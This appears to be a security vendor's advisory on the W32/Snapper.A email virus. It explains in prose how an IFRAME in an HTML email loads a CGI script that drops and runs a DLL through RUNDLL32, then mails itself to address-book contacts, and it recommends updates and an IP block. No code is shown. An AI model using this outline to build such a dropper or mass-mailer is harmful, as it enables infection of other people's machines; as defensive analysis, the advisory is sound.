W32/Snapper.A
Analysis
Specifics
This threat was short-lived in that one of the main
components are no longer accessible. This threat is
composed of four parts;
HTML email message - spawned by the virus as Ieload.dll
HTML web page - accessed when link accessed via email
CGI script - accessed by HTML web page
DLL component - virus; initiates email messages to others
Without the .CGI script component, this threat does not exist.
HTML Email Vector
This threat is introduced to a system via an email message
sent from an infected client. The email itself contains
a hyperlink to a web address containing HTML code -
this code then accesses a .CGI script which creates
a local file named Ieload.dll. The file is created from
embedded codes within the .CGI script.
The email may arrive in this format -
Subject: Re:
Body:
(none)
The body of the email contains HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.
CGI File Creation
When the email is opened, it accesses a web address
and the file "banner.htm". This HTML file
uses an Object data tag to access the .CGI script for
Internet Explorer browsers 5.0 or 5.5, and if the browser
version is 6.0 the HTM code uses an IFRAME to access
the .CGI script. The .CGI script contains an embedded
.DLL file which is decoded into the Windows folder as
"Ieload.dll", with a file size of 8,704 bytes.
The .CGI script then activates the .DLL file using the
Windows application file RUNDLL32.
DLL Email Creation
When the binary "Ieload.dll" is activated
using RUNDLL32, the code then accesses the Windows Address
book (WAB) and attempts to generate emails for each
contact listed. The email is created in this format
-
Subject: Re:
Body:
(none)
The body of the email contains HTML code with an IFRAME
reference to the HTML file "banner.htm" at
a specific IP address.
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block internal to external access to the IP address 198.170.245.129